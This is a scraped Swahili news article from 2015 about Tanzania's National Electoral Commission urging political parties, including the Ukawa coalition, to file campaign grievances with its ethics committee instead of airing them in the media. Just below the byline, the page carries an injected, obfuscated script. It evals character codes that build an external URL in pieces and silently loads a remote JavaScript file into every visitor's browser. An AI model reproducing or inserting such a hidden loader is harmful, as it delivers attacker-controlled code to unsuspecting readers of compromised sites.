Recent Comments

Vyama vya siasa vipeleke malalamiko panapohusika

By Baraka Bitariho Sep 22, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

nec-logo

TUME ya Taifa ya Uchaguzi (NEC), imevitaka vyama vya siasa nchini viitumie ipasavyo kwa kuifikishia malalamiko wakati wote vitakapoona vimedhulumiwa haki ili madai husika yatafutiwe ufumbuzi kwa mujibu wa taratibu zilizopo, badala ya kunung’unika chinichini au kukimbilia kwenye vyombo vya habari.

Katika mkutano uliofanyika Dar es Salaam juzi kati ya Tume hiyo na wanahabari, Kaimu Mkurugenzi wa Huduma za Sheria za NEC, Emmanuel Kawishe alisema, tangu kampeni za uchaguzi mkuu zianze karibu vyama vyote vilivyolalamika kudhulumiwa haki vimekwepa kuchukua hatua ya kuijulisha Kamati ya Maadili ya NEC kama vilivyokubaliana awali.

Kawishe alisema, badala yake, vimekuwa vikilalamika pembeni na kwenye vyombo vya habari, hatua inayoifanya tume hiyo ishindwe kufanyia kazi malalamiko hayo, kwa sababu si rasmi.

Inaelezwa kuwa, vyama vya siasa 22 vilikubaliana na kusaini Maadili ya Uchaguzi yaliyohusisha kipengele kinachovitaka vitakavyoona kuwa vimedhulumiwa haki wakati huo wa kampeni na uchaguzi, vifikishe malalamiko hayo kwa kamati hiyo ya maadili ili yafanyiwe kazi.

Katika maelezo yake kwa wanahabari, Kawishe alisema vyama vya siasa kuacha kufuata ngazi husika kupeleka malalamiko ni kukiuka maadili viliyoyakubali na kuyasaini. Alivitaja moja kwa moja vyama vinavyounda Ukawa; Chama cha Demokrasia na Maendeleo (Chadema), NLD, CUF na NCCR-Mageuzi kuwa mfano wa vyama vinavyoendelea kukiuka makubaliano hayo kwa kushindwa kushitaki kwenye tume kuhusu mgogoro unaoendelea ndani ya umoja huo ili upatiwe suluhu.

Kawishe alisema, ingawa malalamiko yanayoripotiwa kwenye vyombo vya habari ni mengi yanayohusisha vyama mbalimbali, kamati ya maadili imepokea mawili tu yaliyo tofauti na malalamiko ambayo vyombo hivyo vya habari vimeyaeleza.

Alieleza kuwa mashitaka yaliyopokewa yanahusu vyama kuingiliana ratiba za kampeni zinazoendelea, ambayo hata hivyo yalishughulikiwa na kupatiwa ufumbuzi kwa amani na haraka. Kwa mantiki hiyo, tunaona kuna umuhimu wa vyama vya siasa kuanza kuitumia kamati hiyo kama vilivyo kubaliana ili malalamiko yanayofikishwa kwenye chombo hicho yafanyiwe kazi kwa haki.

Aidha, tunapenda kuwakumbusha viongozi wa vyama vya siasa pamoja na wanachama wao kuwa ingawa vyombo vya habari vipo kwa ajili yao, kuvitumia kana kwamba vinaweza kutoa uamuzi wa mwisho kuhusu malalamiko au mashitaka yao ni kujipotosha.

Aidha, kwa kuwa NEC ilikwishaweka wazi mapema nia na wajibu wake wa kuhakikisha uchaguzi mkuu unapita kwa usalama, itakuwa busara endapo vyama vya siasa vitashiriki kuisaidia ifanikishe azma hiyo, badala ya kuwa chanzo cha chokochoko zinazoweza kusababisha uvunjifu wa amani. Kwa ufupi, vyombo vya habari vina wajibu tofauti na suala zima la kushughulikia malalamiko.

Vinapaswa vitumiwe kwa mambo ya maendeleo na si kusambaza taarifa za migogoro ya kisiasa baina ya vyama vya siasa au wafuasi wake. Kutokana na ukweli huo, tunawajibika kuvikumbusha vyama vyenye migogoro kutekeleza makubaliano kwa kushitaki ukiukwaji wowote wa maadili ya uchaguzi kwa kamati hiyo. Hili litasaidia katika kuhakikisha migogoro inafanyiwa kazi na kuchukuliwa hatua kabla ya siku ya uchaguzi ili umalizike kwa amani.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com